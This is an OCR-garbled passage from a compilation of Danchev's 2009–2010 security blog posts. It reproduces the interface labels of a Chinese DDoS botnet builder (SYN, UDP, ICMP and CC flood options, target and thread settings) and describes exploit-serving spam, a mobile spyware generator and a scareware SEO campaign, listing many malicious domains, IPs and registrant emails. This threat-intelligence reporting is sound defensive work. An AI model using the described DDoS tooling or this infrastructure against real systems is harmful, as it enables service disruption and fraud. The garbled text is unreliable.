‘Program start-up time: 09YearlOncon02Day 01:49:35 Send: 0.00 kb/s Receive: 0.00 kb/s Listen port: 8Tf On-line host: 1 


3458 


— 
¢ 
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oO} 
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oO 
a. 
oO 
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of 
oO 

jo 

in 
ont 


Nhat atte thei tlc 
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5:3133 
32: 15844 
130: 1828 
39: 3400 
(66:5... 
i7:1224 
38: 1382 
14:3052 
240:6... 
(38:6... 
31:1330 
TOs... 
3151786 
26: 1466 
254: 2838 
{7:1225 


¥JT-09022313 
al27 
03 


089 
Xny- 078 
PC-20090928. . . 


03:82745 


2197 
31 


'03 60430 


4-2300 
12: 1361 
‘S:1798 
S:1241 
S1:1106 
i:130S 
!:41009 
18: 17401 


pel03 
pelS2 


“FC-20091120... 
PC-20080727... 


i ndowsXP 


WindowsXP 
WindowsXP 
WindowskP 
WindowsXP 
WindowsXP 
WindowsXP 
WindowsXP 
WindowskP 
WindowsXP 
WindowsXP 
WindowsXP 
WindowsXP 
WindowsXP 
WindowskP 
WindowsXP 
WindowsXP 
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; e Document Management 
Screen monitor 


The process of inquiry 
DistanceShell 
Video capture 


Shutdown 
Restart 
Prite off 


Uninstell 


Owinte Ovinz00002003 OSelect all OMegative Se  ODeselect [tionad opt}|100 lyon 


[Download_ NS | | |_Restert_ | 
[Pop-up page] URL: http://w. _t i 


| Online Host DDOS Attack Dummyattack Self-attack Update IP Settings buildserver home Quit 


CC attack polli (task 5) 
Nitdceamire rrr fo ao | 
Port: [go Thread: [ao | Amount: so $) The use of on-line list of selected host Stop 


Description: At present, only support changing the number of type parameters, and only supports a varieble parameter. 
Please change URL in the number of parts replaced with® d, as a wildcard URL. 


CC attack polling (task 6) 


¥ildcardURLwew. = Paranet o  — |jz00 | 
Port: (0 Thread: (40 | Amount: 50 Z| The use of on-line list of selected host Stop 


Description: At present, only support changing the number of type peremeters, and only supports a variable peraneter. 
Please change URL in the number of parts replaced with® d, as a wildcard URL. 


Since the definition of attack packet (task 7) 


ANSI string (unlimited 16~band data (unlimited size) 


— 


OrcmpectwsIS wing = <3 
OvmPpact 16 hexadecimal string Thread: Amount: iso | On-line list of host stop 
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y Attack classification 
(01) TCP Flood [02] SYN Flood (03) UDP Flood (04) ICMP Flood (0S) TCP+SYN Flood (05) TCP+ICMP Flood 
(07) ICMP+VDP Flood [08] TCP+SYN+ICMP Flood [09] CC Variation 


; Test group test group of 1-5 


Type: [01 w] Most:[ | —[  Threedl cup: [  Fabag| Tereet) |....-~—*Port:|*s=~Ot'~“‘<‘éd és 
Type:[oc +] Most:[ | —-[ | Threadf | cap: [ | Fabag] = Target] =——(<i;é‘(tr*;*;*éRrtL:CO*;‘éd éO 
Type:[os +] Most:[ | --| | Thread] | cap: | —sFabug| = Tarcet] = =2=0Ss—(<isé‘(i‘éPort:i(é~*é‘«‘é RO 
Type:[oa >] Most:[ | --| | Thread] | gap: [| Fabs] = Tareet] =  +©Port:| ~~‘ Eff 
‘Type:[05 y] Most:[ [Thread] —gup: [ —Fabug] = Tureet{ = stt*=“‘é‘éiR ot ’:CO:*«*d Ce 


Custom Package body (512 characters) Test Group 6 


|Type: ol yv Host: | --| Threea| cep: j 
“gap: | Target| port: | [ Effect 


Description: Thread Unit:; the interval unit: ms; contracting unit:; the target format: wew.abc.com, or 128.1.1.1, when 
‘you select (09) when the format is wee. abc. com / index. asp; 


Group ITest | Group aText| Group STest| © set: © seti @ seti [~ Auto Radio Files 


sete © set! C sett 


| Group aTest | Group STest | Group 8Test | FP skatetGreup [ AutomAddedAt tack | 
I 


Conventional/attack febsite/attacks: Special attacks: Combined/attack: The/latest/attack: 
(01]SYN Flood [O2]ICMP Flood [O7]No bufferGet (10]Network attack [ISJSYN+UDP Flood [16]Fin_Waitl Attack 


(O3]UDP Flood [04]UDPDebris [08] CCVari ation (11]Gateway/Routing [14] ICMP+ICP Flood (i7]Fin_Wait2 Attack 
(OS]TCP Flood [06]TCPMulti-join [O9]HITPEmpty/GET/re (12]Intelligent/Hybi[IS]UDP +1CP Connect [16]Established Attack 


Manually select the console mode (task 0) 
Target: fnttp://wwn. target. com/show. asp?i d=123 [” New on-line attacks 
Port: 30 Attack type: 08 x] Thread: fi0 =] Amount: fico =] 7 The use of alist of host Stop | 


Automatically selects the host mode (tasks 1~4) 
Type‘ lo3 + Thread/io =] Amount 100 =] Target . target. com Port: fo Attack | Stop | 
Type:[03 ¥] Thread[i0 —] Amounti00 =] Target few. target2. com Port: Attack : Stop | 
Type: |03 ¥ Threadjio =] Amount }00 —4 Target wer. target. com Port: fo Attack Stop 

Type:[03 ¥] Thread[i0 =] Amounti00 J Target frow. tarzet4. com Port: [60 Attack | Stop | 


CC attack polling (task 5) 


Wildcard/URL http: //wew. target. con/showlist. asp?id=%d Parameters: [1 =fixz _ Attack _| 
Port/attack: [80 Thread: fis =| Amount : foo =| Z| The neo of an-line Viet af colected haet _ Stop _| 


Description: At present, support changing the number of type parameters, and only supports a variable parameter. 
Please URL in the er of parts r d witht Tacard URL. 


£ aced wi as awi 


Targets can be IP / DNS / web page URL. CC variant CC attacks and 
the need for polling URL as a parameter. 

DNS Example: www. baidu com Ip Example: 202.199. 24.35 
VRL = Example: http://www. abc. com/show. asp?id=123 


http://www. abe. com/index. htm 
http://www. abc. com/ 
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Intensity settings 


—- a — 
80 ‘Test time: 
r ot is ‘ 
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Software(h) Set($) Help(H) 
Build 


Update on-line 
MB Online Host 


Memory (MB) 


Host selection and function of 


© Select All © Select All XP O Select All 2003 OSelect All VISTA [ )Mide List 


© tnchechAlt © Ivers SelectnotAtteck 0] 
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Software(A) Set($) Help(H) 


ol 


ic aan 


Traffic Attack Mode 
TCP Multi-link Attacks 
Target: Port: time (Minutes): 


we.168.0.1 |(0) fo | 


ASPD: 


Thread: 


ICMP Flood attacks 
Target: Port: time (Minutes): 


fwe.ie0.01 |fa0) fo | 


ASPD: 


Thread: 


At8080partListen On-line hostIP:127.0.0.1 
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os a df 


Minimize 


Web Attack Mode 


UDP Flood Attacks 
Target: Port: time (inutes): 


we. 100.01 |e] fo | 


Legend GamesSF Attacks 
eae Port: 


ASPD: 


Thread: 


time Minutes): 


ASPD: 


Thread: 


Online Host: 1 your 


Software(F) Set($) Help(H) 


CC BT Attack 
Target: Port: 


Speed: 


[ao] (Attecten)} (Kestopa) 


simulate GET open Attack 
Target: Port: 


Speed: 


[ao (Attacks) [estonia] 


Time Minutes): 


Thread: 


Time (Minutes): 


Thread: 


Invincible CC Attack 
Target: Port: 


2 


——_{[}——. 


Time Minutes): 


Speed: 


Thread: 


Reincarnation cycle of CC Attack 


Target: Port: 


Parameters: fo | —— [) Random-Pa 
| Attack | 


Speed: 


Thread: 
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——————————————V ll Es) 


= = bur * 
Update on-line Build Theme Set HOME Minimize Exit 
| ME Online Host 15) Attack parameter & Help | 
| Traffic Attack Mode | Web Attack Mode | complexAttack | Custom Mode | Other features 
Pure attack traffic patterns Pure connection mode attack 
Target: Port: Target: Port: 
192. 168.0. 1 80 192. 166.0.1 80 
Time (Minutes): 20 Thread: 100 Time (Minutes): (20 | Thread: 
Speed: {.} Speed:: i 
ServersendSYNbagHomesendUDbaz ServersendSYNbagHomesendICPbhag 
Server agACKbagHomesendUDPbazg ServersendACKbagHomesendICPbhag 
ServersendForged sourceUDPbagHomesendUDPbag ServersendICPbhaghomesendTCPbag 
Attack stop Attack stop 
At8080partListen On-line hostIP:127.0.0.1 Online Host: 1 your 


Detection rates for the publicly obtainable builders of multiple versions: 

- MS.exe - [7]Backdoor.Hupigon.AAAH - Result: 26/40 (65 %) 

- msn.exe - [8]Win32.BDSPoison.Cpd - Result: 36/41 (87.81 %) 

- test.exe (crimeware experiment) - [9]Hacktool.Rootkit - Result: 24/41 (58.54 %) 

- ms1.exe - [10]Backdoor.Win32.BlackHole - Result: 13/41 (31.71 %) 

- ms1.exe - [11]W32/Hupigon.gen227; Backdoor.Hupigon.AAAH - Result: 35/41 (85.37 %) 


Based on the profiling the localization of this tool to Chinese since 2007, the diversifica- 
tion of the DDoS attacks introduced in it by Chinese coders ([12]Localizing Open Source 
Malware; [13]Custom DDoS Capabilities Within a Malware; [14]Custom DDoS Attacks 
Within Popular Malware Diversifying), perhaps the most important conclusion that can 
be drawn is that, tolerating their activities in the long term results in the development of 
more sophisticated capabilities which can now be offered to a well established customer base. 


If Chinese hacktivists managed to take CNN.com offline ({15]The DDoS Attack Against 
CNN.com; [16]Chinese Hacktivists Waging People’s Information Warfare Against CNN) using 
nothing else but ping flooders/iFrames loading multiple copies of the site, the collectivist 
response in a future incident using these much more sophisticated tools - sophisticated in 
sense of the diverse set of DDoS attacks offered - is prone to be much more effective. 
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Related Chinese hacking scene/hacktivism coverage: 

[17]Localizing Open Source Malware 

[18]Custom DDoS Capabilities Within a Malware 

[19]Custom DDoS Attacks Within Popular Malware Diversifying 
[20]The FirePack Exploitation Kit Localized to Chinese 

[21]MPack and IcePack Localized to Chinese 

[22]Massive SQL Injection Attacks - the Chinese Way 

[23]A Chinese DIY Multi-Feature Malware 

[24]DIY Chinese Passwords Stealer 

[25]A Chinese Malware Downloader in the Wild 

[26]Chinese Hackers Attacking U.S Department of Defense Networks 
[27]Chinese Hacktivists Waging People’s Information Warfare Against CNN 
[28]The DDoS Attack Against CNN.com 


This post has been reproduced from [29]Dancho Danchev’s blog. Follow him 
[30]Jon Twitter. 


. http://ddanchev. blogspot .com/2007/07/shark2-rat-or-malware.htm 


ttp://ddanchev .blogspot.com/2008/10/massive-sql-injection-attacks-chinese.htm 


. http: //ddanchev.blogspot .com/2007/09/localizing-open-source-malware .htm 


1 
2 
3 
4. http://ddanchev. blogspot .com/2007/09/custom-ddos-capabilities-within-malware.htm 
5 
6 
7 


. http: //ddanchev.blogspot .com/2008/05/custom-ddos-attacks-within-popular.htm 
. http: //ddanchev. blogspot .com/2007/12/inside- chinese-underground-economy. htm 
ttp://www.virustotal .com/analisis/69460403520488b78e98745af e0092ef eadad87a5cbd2cff 1bcf3292a86db99f- 12748 


8. ttp://www.virustotal.com/analisis/818abb0a63513450cac6cf2c6fea42db9854c80c64b0e63c38a30df5be5b77f£d- 12748 
1842 


11. http: //www.virustotal.com/analisis/2d4f 18edaf98d74606d8477 c4a20a0d23aeb342bf a8f4dcc7a00680a603a1865-12748 
12. http://ddanchev. blogspot .com/2007/09/localizing-open-source-malware.htm 


ttp://ddanchev. blogspot .com/2007/09/custom-ddos-capabilities-within-malware.html 


14. http://ddanchev. blogspot .com/2008/05/custom-ddos-attacks-within- popular. htm 
. http://ddanchev. blogspot .com/2008/04/ddos-attack-against-cnncom.htm 
16. http://ddanchev. blogspot .com/2008/04/chinese-hacktivists-waging-peoples.htm 


ttp://ddanchev. blogspot .com/2007/09/localizing-open-source-malware.htm 


ttp://ddanchev. blogspot .com/2007/09/custom-ddos-capabilities-within-malware.html 


19. http://ddanchev. blogspot .com/2008/05/custom-ddos-attacks-within-popular.htm 


ttp://ddanchev. blogspot .com/2008/05/firepack-exploitation-kit-localized-to.htm 


ttp://ddanchev. blogspot .com/2007/10/mpack-and-icepack-localized-to-chinese.htm 


ttp://ddanchev. blogspot .com/2008/10/massive-sql-injection-attacks-chinese.htm 


23, 
2a, 

_hetp:/ /adanchev. blogspot .con/2007/09/chinese-salvare-dovrloaderin- wild. heal 
26. 


ttp://ddanchev. blogspot .com/2008/04/chinese-hacktivists-waging-peoples. html 
ttp://ddanchev. blogspot .com/2008/04/ddos-attack-against-cnncom.htm 
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29. http://ddanchev.blogspot.com/ 


30. http://twitter.com/danchodanche 


6.5.15 Spamvertised Client-Side Exploits Serving Adult Content Themed Campaign 
(2010-05-28 15:29) 


an 


WOO EXCLUSIVE ~ 


There’s no such thing as free porn, unless there are client-side exploits in the unique value 
proposition’s mix. 


A currently spamvertised campaign is doing exactly the same, in between relying on the 
recent [1]CVE-2010-0886 vulnerability. Let’s dissect the campaign, and combine the assess- 
ment with historical OSINT data, given the fact that the 2nd phone back location, including 
the binary hosted there are currently down. 


¢ Key summary point: although the exploitation is taking place, the campaign is currently 
failing to drop actual binary, returning NOEXEFILE error message. The post will be updated 
once the situation changes. 
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This post has been reproduced from [2]Dancho Danchev’s blog. Follow him 
[3]Jon Twitter. 


1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE- 2010-0886 


2. http://ddanchev.blogspot.com/ 
3. http://twitter .com/danchodanche 


6.5.16 Summarizing Zero Day’s Posts for May (2010-05-31 18:40) 


Home | News & Blogs 


Let's protect the network by sealing 
ZDNet Must Read the gateway 


cow) 


_ eo - 
Blogger Info 5 reasons why the proposed ID scheme for 
Ryan Nareine Internet users is a bad idea Geet it the way you want it 
ems 
Dazxho Danche Imagne watang up in a workd, where you would need to use two-factor 
. a athenoc avon teome 


are five reasons why 1 thenk this is a bad idea 


ased I 


in Order to do arrythang onkne. Here 


About Zero Dey a : . 

staying ontep cfthe Study finds the average price for renting a botnet 

latest in % ZDNet's White Paper Membership 
Newsletter: Stay currert with site news 
and updates from Wihete Pacers 


softw are/h. 


re Based on an experment coma.xcted by researchers from VenSegs 


secumty re 


Defense Irkelperve Operations Team, involving 25 diferent “rent a 
wulner ababes botnet” underground marketplace propesmeons, they were able G ZDNet's Must-Read News Alerts: 


threats and computer Bresicng IT news as @ happens 
attacks The simple elegance of faith (a response to 
Michal Zalewski) 


Vendor HotSpot 


Save 10% bars Amrit Wihams: What we must learn to accept is that security - as @ Be a fan on Facebook 
Enterprise-Class t pmert of software and &s operatonal use 

Virtualization and is uitimately more survivable than we tke to bebeve Follow us on Twitter 
Linux Support 


Watch us on YouTube 


ars 


Hotmail's new security features vs Gmail's old 
security features 


Microsoft's revamped Hotmad, set to be rolled cok i mid-summer 
i. according to the company’s press release, introduces several mew 


features. Let's review them, thew appbcabdity to today’s cyber lr 


Get better support at a 
cost with Security engineering: broken promises 
Orade WM and Oracle 


Unbreakable Linn For several decades, we have m essere completely faded to come up 


from sust $119 oer wth on the meet eodemane ae se thin fenencnrte fee undaset wna PICnH 


3 low 


The following is a brief summary of all of my posts at [1]ZDNet’s Zero Day for May, 2010. You 
[2]can also go through [3]previous summaries, as well as subscribe to my [4]personal RSS 
feed, [5]Zero Day’s main feed, or follow me on Twitter: 
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Recommended reading: 


[6]Should a targeted country strike back at the cyber attackers? 


[7]Hotmail’s new security features vs Gmail’s old security features 


[8]Study finds the average price for renting a botnet 


[9]5 reasons why the proposed ID scheme for Internet users is a bad idea 


01. [10]Foxit Reader intros new Safe Reading feature 

02. [11]Should a targeted country strike back at the cyber attackers? 

03. [12]Malware Watch: iTunes gift certificates, Skype worm, fake CVs and greeting cards 

04. [13]Wardriving police: password protect your wireless, or face a fine 

05. [14]Research: 1.3 million malicious ads viewed daily 

06. [15]Malware Watch: Rogue Facebook apps, fake Amazon orders, and bogus Adobe updates 
07. [16]Hotmail’s new security features vs Gmail’s old security features 

08. [17]Study finds the average price for renting a botnet 

09. [18]5 reasons why the proposed ID scheme for Internet users is a bad idea 


This post has been reproduced from [19]Dancho Danchev’s blog. Follow him 
[20]Jon Twitter. 


. http: //blogs.zdnet.com/securit 


ttp://ddanchev. blogspot .com/2010/04/summarizing-zero-days-posts-for-april.htm 


. http: //ddanchev. blogspot .com/2010/04/summarizing-zero-days-posts-for-march.htm 


. http: //www.zdnet .com/topics/danchotdanchev?o=1&mode=rssktag=mantle_skin; content 


1 

2 

3 

4 

5 
6. 

7 

8 
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.zdnet .com/blog/security/should-a-targeted-country-strike-back-at-the-cyber-attackers/6194 
zdnet .com/blog/security/hotmails-new-security-features-vs-gmails-old-security-features/6509 
.zdnet .com/blog/security/study-finds-the-average-price-for-renting-a-botnet/6528 


.zdnet.com/blog/security/5-reasons-why-the-proposed-id-scheme-for-internet-users- is-a-bad-idea/ 


12. http://www.zdnet .com/blog/security/malware-watch-itunes-gift-certificates-skype-worm-fake-cvs-and-greet 


ing-cards/642 


13. http://www.zdnet.com/blog/security/wardriving-police-password-protect-your-wireless-or-face-a-fine/6438 


14. http://www.zdnet.com/blog/security/research-13-million-malicious-ads-viewed-daily/6466 


15. bttp://www.zdnet.com/blog/security/malware-watch-rogue-facebook- apps- fake-amazon-orders-and-bogus- adobe 


updates/6480 


16. http://www.zdnet.com/blog/security/hotmails-new-security-features-vs-gmails-old-security-features/6509 


17. http://www.zdnet.com/blog/security/study-finds-the-average-price-for-renting-a-botnet/6528 


18. http://www.zdnet .com/blog/security/5-reasons-why-the-proposed-id-scheme-for-internet-users-is-a-bad-ide 


a/652 
19. http://ddanchev.blogspot.com/ 
20. http://twitter.com/danchodanche 
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6.6 June 


6.6.1 Vendor of Mobile Spying Apps Drives Biz Model Through DIY Generators 
(2010-06-03 15:09) 


Wpdste 


Enter IMEI: 


358973014073890 


Select configuration: 


© Spy Phone with PATCH 
@ Spy Phone FULI 


Enter 4 symbols code: 


0000 


Signing with: 


Certificate file 
E:\GenSet\ihp, pfx. cer - 
Key file: 


E:\GenSet\ihp, pfx. key we 


Passphrase: 


Exit 


It’s always worth monitoring the developments in the commercial mobile spying apps space. 
In particular, the inevitable customerization/customization of their services. 


A shady vendor of such applications, is attempting to migrate from the mass market 
model of competing vendors, by offering its potential customers to ability to generate their 
own .sis files, for the spying app targeting Symbian OS 9 platform. The DIY features also 
include [1]the ability to self sign their own certificates. The price tag? A hefty price tag of 
£3000, and no refunds offered. 
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What’s their true motivation behind the release of the DIY generation tool? It appears that they 
are primarily interested with scaling their business operations, allowing potential resellers the 
option to automatically generate the spying apps. Although the self-signing certificate option 
is interesting, mobile [2]malware authors continue abusing Symbian Foundation’s certificate 
signing process, surprisingly, by using bogus company names with no public reference of 
their existence. 


Thanks to the improving monetization models for mobile malware (e.g.  calling/SMSing 
premium rate numbers), mobile malware authors are only starting to realize/abuse the 
potential of the micro payments market segment. 


Related posts on mobile malware: 

[3]The future of mobile malware - digitally signed by Symbian? 
[4]Commercial spying app for Android devices released 

[5]iHacked: jailbroken iPhones compromised, $5 ransom demanded 
[6]New Symbian-based mobile worm circulating in the wild 

[7]New mobile malware silently transfers account credit 
[8]Transmitter.C mobile malware spreading in the wild 
[9]Transmitter.C Mobile Malware in the Wild 

[10]Proof of Concept Symbian Malware Courtesy of the Academic World 
[11]Commercializing Mobile Malware 

[12]Mobile Malware Scam iSexPlayer Wants Your Money 


Related posts on SMS Ransomware: 

[13]New ransomware locks PCs, demands premium SMS for removal 
[14]Mac OS X SMS ransomware - hype or real threat? 

[15]SMS Ransomware Displays Persistent Inline Ads 

[16]6th SMS Ransomware Variant Offered for Sale 

[17]5th SMS Ransomware Variant Offered for Sale 

[18]4th SMS Ransomware Variant Offered for Sale 

[19]3rd SMS Ransomware Variant Offered for Sale 
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[20]SMS Ransomware Source Code Now Offered for Sale 


This post has been reproduced from [21]Dancho Danchev’s blog. Follow him 
[22]Jon Twitter. 


://wiki.forum.nokia. com/index .php/How_to_guide_for_creating/signing sis_files 


.com/blog/security/the-future-of-mobile-malware-digitally-signed-by-symbian/3781 
.com/blog/security/the-future-of-mobile-malware-digitally-signed-by-symbian/3781 
.com/blog/security/commercial-spying-app-for-android-devices-released/4900 
.com/blog/security/ihacked- jailbroken- iphones-compromised-5-ransom-demanded/480, 
.com/blog/security/new-symbian-based-mobile-worm-circulating-in-the-wild/261 
.com/blog/security/new-mobile-malware-silently-transfers-account-credit/241 


.com/blog/security/transmitterc-mobile-malware-spreading- in-the-wild/371 


://ddanchev . blogspot .com/2009/07/transmitterc-mobile-malware-in-wild.htm 


. http://ddanchev. blogspot .com/2006/11/proof-of-concept-symbian-malware.htm 


. http://ddanchev. blogspot .com/2007/05/commercializing-mobile-malware_18.htm 


. http://ddanchev. blogspot .com/2008/07/mobile-malware-scam-isexplayer-wants.htm 


. http://www.zdnet .com/blog/security/new-ransomware-1locks-pcs-demands-premium-sms-for-removal/319 
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oO 
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. http://www.zdnet .com/blog/security/mac- os-x-sms-ransomware-hype-or-real-threat/5731 


15. http://ddanchev. blogspot .com/2009/09/sms-ransomware-displays-persistent .htm 


16. http://ddanchev. blogspot .com/2009/08/6th-sms-ransomware-variant-offered-for.htm 
17. bttp://ddanchev. blogspot .com/2009/07/5th-sms-ransomware-variant-offered-for.htm 
. http://ddanchev. blogspot .com/2009/07/4th-sms-ransomware-variant-offered-for.htm 


19. http://ddanchev. blogspot .com/2009/05/3rd-sms-ransomware-variant-offered-for.htm 
20. http://ddanchev. blogspot .com/2009/05/sms-ransomware-source-code-now-offered.htm 
21. http://ddanchev.blogspot.com/ 


22. http://twitter .com/danchodanche 
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6.6.2 Dissecting the Ongoing U.S Federal Forms Themed Blackhat SEO Campaign - 
Part Two (2010-06-03 18:56) 


DDanchev 
Rained 
On My 


Scareware 
Campaign 


UPDATED: Sunday, June 06, 2010. 
The new redirections currently take place through www4.greatav40-td.co.cc/?uid=213 &pid=3 
&ttl=51545746f5c (93.190.141.40) and www1.avscaner-40pr.co.ce (217.23.5.52). 
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Parked on 93.190.141.40, AS49981, WorldStream are also: 
www3.justsoft12-td.co.cc 
www3.donrart55-td.co.cc 
www3.donrart57-td.co.cc 
www3.donrart59-td.co.cc 
www4.swintermz.cz.cc 
www3.goldvox-50td.xorg.pl 
www3.goldvox-60td.xorg.pl 
www3.goldvox-52td.xorg.pl 
www3.goldvox-54td.xorg.pl 
www3.goldvox-64td.xorg.pl 
www3.goldvox-56td.xorg.pl 
www3.goldvox-58td.xorg.pl 

www 1.check-saveyour-pc-now.in 
www1.in-safe-keepmyzone.in 
www1.makesafe-scan-forsure.com 


Detection rate: 


- packupdatel107 213.exe - [1]Trojan.Fakealert.origin; Mal/FakeAV-BW - Result: 12/41 (29.27 
%) 


*in-safe-keepmyzone.in 


hostmasterin-safe-keepmyzone.in 


hostmastermakesale-scan-forsure.com 
93,190.140.0/22 ——“2-g> 4sag981 


www L.check-saveyour-pe-now.in 
www 'L.in-safe-keepmyzone.in 


www1L.makesafe-scan-forsure.com 


Upon execution, the sample phones back to: 

updatel.free-guard.com - 95.169.186.25; 188.124.5.64 - Email: gkook@checkjemail.nl 
update2.protect-helper.com - 78.159.108.170 - Email: gkook@checkjemail.nl 
secure2.protectzone.net - 91.207.192.24 - Email: gkook@checkjemail.nl 
securel.protect-zone.com - 209.212.147.241 - Email: gkook@checkjemail.nl 
securel.protect-zone.com - 209.212.147.241 - Email: gkook@checkjemail.nl 
www5.securitymasterav.com - 91.207.192.25 - Email: gkook@checkjemail.nl 
update2.free-guard.net - Email: gkook@checkjemail.nl 
report.land-protection.com - 188.124.7.156 - Email: gkook@checkjemail.nl 
report.goodguardz.com - 93.186.124.94 - Email: gkook@checkjemail.nl 
report.zoneguardland.com - 93.186.124.91 - Email: gkook@checkjemail.nl 
report1,stat-mx.xorg.pl - 109.196.132.41 - Email: gkook@checkjemail.nl 
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securel.protect-zone.com - 209.212.147.241 - Email: gkook@checkjemail.nl 
74.125.45.100 
74.82.216.3 


Parked on 95.169.186.25 (AS31103, KEYWEB-AS); 188.124.5.64 (AS44565, VITAL TEKNOLO}I) 
are also: 
www3.justsoft11-td.co.cc 
www3.justsoft12-td.co.cc 
www4.swintermz.cz.cc 
www4.trustzone17-td.xorg.pl 
www3.coantys-41td.xorg.pl 
www3.coantys-42td.xorg.pl 
www3.coantys-46td.xorg.pl 
www4.miymiy3.com 
updatel.free-guard.com 
useguard.com 
updatel.useguard.com 
www2.avcleaner30-pd.co.cc 
www/1.favoritav30-pd.co.cc 
www2.avcleaner32-pd.co.cc 
www2.avcleaner34-pd.co.cc 
www1.favoritav34-pd.co.cc 
www2.avcleaner36-pd.co.cc 
www/1.favoritav36-pd.co.cc 
www3.avprotector54-td.xorg.pl 
www3.avprotector56-td.xorg.pl 
updatel.free-guard.com 
updatel.winsystemupdates.com 


Remember the massive blackhat SEO campaign using U.S Federal Forms themed key- 
words, which was extensively profiled in August, 2009? 


¢ [2]Blackhat SEO Campaign Hijacks U.S Federal Form Keywords, Serves Scareware 


¢ [3]U.S Federal Forms Blackhat SEO Themed Scareware Campaign Expanding 


[4]Dissecting the Ongoing U.S Federal Forms Themed Blackhat SEO Campaign 


¢ [5]Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline - multiple connections 


The cybercriminals behind it, never really stopped feeding new domains, including compro- 
mised ones, naturally diversifying the set of topics in order to serve scareware. Now that 
enough data is gathered, naturally exposing connections within the cybercrime ecosystem 
which would be communicated using the "perfect timing, perfect channel" philosophy, it’s 
time to dissect the online campaign, expose the entire portfolio of domains involved, and, of 
course, take it down. 
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Information Returns (Forms 1042-S, 1098, 1099, 5498, 8027 and W2G) 


hitipviwww.irs.goweffefists/0,id=100422 00. nimi 
FREE FORMS with every accompanying data in your own Computer and print the forms for your records. Prepare your tax accountants to print and file 1099 forms. Create, print 


IRS tax forms - Wikipedia, the free encyclopedia 


Nipwen. wikipedia. orgiwikiF orm_ 1099 
From Wikipedia, the free encyclopedia afach Form 1099s to their own Federal income tax returns unless the Form 1099 in more than one state. most employers will print 


Form 1099-MISC Download, 1099MISC, Form 1096, Excel Word Forms 


hiipuiwww_.esmartpayroll. comsword_form_1099MISC. asp 
electronic efile for IRS Tax forms W2 W2-C 940 941 1099 2000 Form 1099-Misc For Windows. Miscellaneous Income, print and mail. Price: FREE 


Convey -1099Convey - Form 1099 Tax Software 


hiipowww._convey.com/solution/standard. asp 
Simply process tax data; Seamlessily make corrections ; Effortiessly print. mail and transmit tax forms FREE 1099 ANALYSIS 


1099 - Wikipedia, the free encyclopedia 


htipvien.wikipedia.orgwiki/1099 
1099. From Wikipedia, the free encyclopedia Special pages; Printable version; Permanent link. Cite this page 


free 1099 forms download 


hitips/3d2t comiags/1099400Cms/ 
AcCcOUM Ability Tax Form Preparation 18.00 1099 MISC Software to print anc efile 1099 MISC Forms. Home > free 1099 forms software download 


What particularly interesting about this gang, is their clear understanding of QA (quality 
assurance) for the sake of increase OPSEC (operational security). Just like the previous 
campaigns, each individual domain involved in the campaign is registered using a separate 
email, in the majority of cases it’s an automatically registered one. With or without the QA, 
there’s no escape from the monetization vector - in this case, and like many other - scareware. 


Domains used in the blackhat SEO campaign, none of these are currently flagged as 
harmful: 

lip5p8h.co.cc - Email: mijkzh@gmail.com 

lus51n.co.cc - Email: mqxd2r2@gmail.com 

aifmydpuhv.co.cc - Email: kent.attonis9140@yahoo.com 
amquijycpntb.co.cc - Email: volf.aittalal388@yahoo.com 
aqejhilmvb.co.cc - Email: amandeep.terrisse8102@yahoo.com 
arnepqjya.co.cc - Email: vkpnzxn@gmail.com 

bekqjcra.co.cc - Email: yaala.benardos7911@yahoo.com 
benyd.co.cc - Email: lexyob610@gmail.com 

bestdesision.co.cc - Email: an9020@bk.ru 

bipilyqomyusvuhy.co.cc - Email: eeclllw3xqul9tr9wb@gmail.com 
bjalumericz.co.cc - Email: diamond.aittala4367@yahoo.com 
chammaope.co.cc - Email: wefergss@ukr.net 

coebfjqmkhsn.co.cc - Email: kent.attonis9140@yahoo.com 
comp-s.co.cc - Email: stas14423321@mail.ru 

eynuqacjrtiz.co.cc - Email: ketina.tomsic2552@yahoo.com 
getmoney4me.co.cc - Email: finalizer12@mail.ru 
goumucnypuxuhyikzi.co.cc - Email: ekx7roq8p5hrd61tah@gmail.com 
hiokirygohxinugohu.co.cc - Email: qg88zh7dwshibteg05I@gmail.com 
hryjhuklo.co.cc - Email: fgyuhedgdrfghhio@ymail.com 
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ibdumycp.co.cc - Email: madelyn.ajail243@yahoo.com 
ifohviwihuuxitqoil.co.cc - Email: bsowez9usp1lu8cjyxp@gmail.com 
ifyfgybyuxisoffu.co.cc - Email: 5nrg2bgm2ogO0cloxpf@gmail.com 
ihquyrvutyridyuwyj.co.cc - Email: wh1p9c5f0jwlvn5jlq@gmail.com 
ijojinhuxifykygysu.co.cc - Email: lq7s26llpq2sxbcyd9@gmail.com 
imdjrsfybnav.co.cc - Email: sarig.ajaye7737@yahoo.com 
incom-sale.co.cc - Email: wisha700 5@yahoo.com 
inoltoumydonulijuk.co.cc - Email: e6pgu8mamts6fco5ik@gmail.com 
iroqimcuohubizgooh.co.cc - Email: skuOcthz7ttgzwaqzw@gmail.com 
iwanti.co.cc - Email: justtobebeauty@gmail.com 

iyqvogx.co.cc - Email: do.co.lo.k.oh.o.ngo.v.o@gmail.com 
jepabhto.co.cc - Email: festas.mcilseyl1646@yahoo.com 
kiaxmh4.co.cc - Email: kiaxmh@kiaxmh.com 
kiboinikixuvquliro.co.cc - Email: 5k2j7bnpxzgkoyibbO@gmail.com 
krghiqyiht.co.cc - Email: ouhegtIx@yahoo.com 
kyogpylymypusulojo.co.cc - Email: rrykuqs44ilgf2xd6q@gmail.com 
Itcsi0.co.cc - Email: v9xodcm@gmail.com 
omsuimuhysjoujiqip.co.cc - Email: nattyxbfpvcaivauf6@gmail.com 
opimuzxiyrxigoiwur.co.cc - Email: ebiy9hwt817zs5mO0wa@gmail.com 
ostozuorypofitjuti.co.cc - Email: 2rdo8uwhl4y5mqckkh@gmail.com 
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chammaope 
rithubmolnd: 


ify yuxisoffu.co.ce 


yzirukwoilokocpohi.co.cc 


irogimcuohubizgooh.co.cc 
inoltoumydonulijuk.co.cc 
ryliydulivuvdoj 

usbokuycr 


146,54, 
146,54.129 
.146,54,143 
yobyumfoodzyqubu cc .146.54.150 
bipilygomyusyvuhy.co, 
coebFigmkhsn.co.cc 


sprqucoatz.co.cc 


pqusrzycd.co.cc - Email: adalricus.aijala4749@yahoo.com 
ptvibnrjeayh.co.cc - Email: miliani.mccomrick3922@yahoo.com 
pubaxj.co.cc - Email: runuk8976@gmail.com 

pucrsnihoqy.co.cc - Email: dalila.babusek8958@yahoo.com 
qbhomskuine.co.cc - Email: keona.canose6839@yahoo.com 
